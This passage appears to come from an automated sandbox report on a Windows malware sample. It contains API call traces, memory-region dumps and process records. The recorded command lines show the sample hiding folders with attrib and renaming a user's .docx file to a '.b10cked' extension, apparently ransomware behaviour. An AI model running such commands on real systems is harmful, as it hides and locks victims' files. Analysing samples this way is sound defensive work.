GetEnvironmentStringsW () returned 0x212dc0* [0134.739] FreeEnvironmentStringsW (penv=0x212dc0) returned 1 [0134.739] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0134.822] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1cef70 | out: lpExitCode=0x1cef70*=0x0) returned 1 [0134.822] CloseHandle (hObject=0x4c) returned 1 [0134.823] _vsnwprintf (in: _Buffer=0x1cf0b8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cef7c | out: _Buffer="00000000") returned 8 [0134.823] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0134.823] GetEnvironmentStringsW () returned 0x212dc0* [0134.823] FreeEnvironmentStringsW (penv=0x212dc0) returned 1 [0134.823] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0134.823] GetEnvironmentStringsW () returned 0x212dc0* [0134.823] FreeEnvironmentStringsW (penv=0x212dc0) returned 1 [0134.823] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cefd4 | out: lpAttributeList=0x1cefd4) [0134.823] GetConsoleTitleW (in: lpConsoleTitle=0x1cf3b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.823] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0134.823] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0134.824] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0134.824] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x1cec54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cec54) returned 0xffffffff [0134.824] GetLastError () returned 0x2 [0134.824] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", 
fInfoLevelId=0x1, lpFindFileData=0x1cec54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cec54) returned 0xffffffff [0134.824] GetLastError () returned 0x2 [0134.824] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x1cec54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cec54) returned 0x20e6a8 [0134.824] FindClose (in: hFindFile=0x20e6a8 | out: hFindFile=0x20e6a8) returned 1 [0134.825] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1cec54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cec54) returned 0xffffffff [0134.825] GetLastError () returned 0x2 [0134.825] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1cec54, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cec54) returned 0x20e6a8 [0134.825] FindClose (in: hFindFile=0x20e6a8 | out: hFindFile=0x20e6a8) returned 1 [0134.825] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0134.825] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0134.825] GetConsoleTitleW (in: lpConsoleTitle=0x1cf14c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.825] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cefd4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf09c | out: lpAttributeList=0x1cefd4, lpSize=0x1cf09c) returned 1 [0134.825] UpdateProcThreadAttribute (in: lpAttributeList=0x1cefd4, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf094, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cefd4, lpPreviousValue=0x0) returned 1 [0134.825] GetStartupInfoW (in: lpStartupInfo=0x1cef90 | out: lpStartupInfo=0x1cef90*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, 
dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0134.825] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0134.825] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1cf030*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf07c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\"", lpProcessInformation=0x1cf07c*(hProcess=0x50, hThread=0x4c, dwProcessId=0xc00, dwThreadId=0xbfc)) returned 1 [0134.827] CloseHandle (hObject=0x4c) returned 1 [0134.827] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0134.827] GetEnvironmentStringsW () returned 0x2137f8* [0134.827] FreeEnvironmentStringsW (penv=0x2137f8) returned 1 [0134.827] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0134.871] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1cef70 | out: lpExitCode=0x1cef70*=0x0) returned 1 [0134.871] CloseHandle (hObject=0x50) returned 1 [0134.871] _vsnwprintf (in: _Buffer=0x1cf0b8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cef7c | out: _Buffer="00000000") returned 8 [0134.871] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0134.871] GetEnvironmentStringsW () returned 0x2137f8* [0134.871] FreeEnvironmentStringsW 
(penv=0x2137f8) returned 1 [0134.871] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0134.871] GetEnvironmentStringsW () returned 0x2137f8* [0134.872] FreeEnvironmentStringsW (penv=0x2137f8) returned 1 [0134.872] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cefd4 | out: lpAttributeList=0x1cefd4) [0134.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.872] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0134.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.872] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0134.872] _get_osfhandle (_FileHandle=0) returned 0x3 [0134.872] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0134.872] SetConsoleInputExeNameW () returned 0x1 [0134.872] GetConsoleOutputCP () returned 0x1b5 [0134.872] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0134.872] SetThreadUILanguage (LangId=0x0) returned 0x409 [0134.872] exit (_Code=0) Process: id = "130" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16740" os_pid = "0xc64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "129" os_parent_pid = "0xc10" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13347 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000010000" filename = "" Region: id = 13348 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13349 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13350 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 13351 start_va = 0xb10000 end_va = 0xb16fff entry_point = 0xb10000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 13352 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13353 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13354 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13355 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 13356 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13357 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13358 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13359 start_va = 0x50000 
end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13360 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 13361 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 13362 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 13363 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13364 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13365 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13366 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13367 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13368 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = 
"\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13369 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13370 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 13371 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13372 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13373 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 13374 start_va = 0x350000 end_va = 0x417fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 13375 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13376 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 187 os_tid = 0xc20 Process: id = "131" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16740" os_pid = "0xc30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = 
"child_process" parent_id = "129" os_parent_pid = "0xc10" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13493 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13494 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13495 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13496 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 13497 start_va = 0xb30000 end_va = 0xb36fff entry_point = 0xb30000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 13498 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13499 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13500 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed 
name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13501 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 13502 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13503 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13504 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13505 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13506 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 13507 start_va = 0x410000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 13508 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 13509 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13510 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13511 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = 
"\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13512 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13513 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13514 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13515 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13516 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 13517 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13518 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13519 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 13520 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: 
id = 13521 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13522 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 188 os_tid = 0xc34 Process: id = "132" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16740" os_pid = "0xc00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "129" os_parent_pid = "0xc10" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13523 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13524 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13525 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13526 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 13527 start_va = 0x5a0000 end_va = 0x5a6fff entry_point = 0x5a0000 region_type = mapped_file name = "attrib.exe" 
filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 13528 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13529 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13530 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13531 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 13532 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13533 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13534 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13535 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13536 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 13537 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 13538 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = 
"\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 13539 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13540 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13541 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13542 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13543 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13544 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13545 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13546 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 13547 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 
region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13548 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13549 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 13550 start_va = 0x140000 end_va = 0x207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 13551 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13552 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 189 os_tid = 0xbfc Process: id = "133" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0xbc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" 
